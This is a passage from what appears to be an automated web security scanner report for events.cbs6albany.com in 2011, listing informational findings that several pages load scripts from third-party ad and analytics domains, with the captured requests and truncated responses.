Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:36:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 23
ETag: "373be00384458d0a6f31fe7d8b0c3dc7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:36:11 GMT; HttpOnly
Content-Length: 37962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Find tickets to events, concerts, sporting events, performing arts theatre and movie tickets on Zvents." />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.175. http://events.cbs6albany.com/albany-ny/venues previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/venues HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 29
ETag: "fb0402ec7459acfc99753521499dddc1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 34111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.176. http://events.cbs6albany.com/albany-ny/venues/show/182888-the-egg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues/show/182888-the-egg

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/venues/show/182888-the-egg HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 470
ETag: "3b4f2106bc014ab68877465013f619f6"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:10 GMT; HttpOnly
Content-Length: 47931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.177. http://events.cbs6albany.com/albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/venues/show/42778-regal-crossgates-mall-stadium-18 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 86
ETag: "264dd00bdd3a49bb59103e1168b63816"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 64071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.178. http://events.cbs6albany.com/albany-ny/venues/show/47192-palace-theatre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues/show/47192-palace-theatre

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/venues/show/47192-palace-theatre HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "eb20606195bf56541c9b1102da067189"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:09 GMT; HttpOnly
Content-Length: 70358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.179. http://events.cbs6albany.com/albany-ny/venues/show/932464-times-union-center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues/show/932464-times-union-center

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/venues/show/932464-times-union-center HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 74
ETag: "85e3a3ad8f5440ce88789bd8cb915d88"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:10 GMT; HttpOnly
Content-Length: 59813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.180. http://events.cbs6albany.com/clifton-park-ny/events/show/164180885-mac-miller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/clifton-park-ny/events/show/164180885-mac-miller

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /clifton-park-ny/events/show/164180885-mac-miller HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:46:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 106
ETag: "f3c8f98af0ea3082246620bf2df25b2b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:46:08 GMT; HttpOnly
Content-Length: 42611

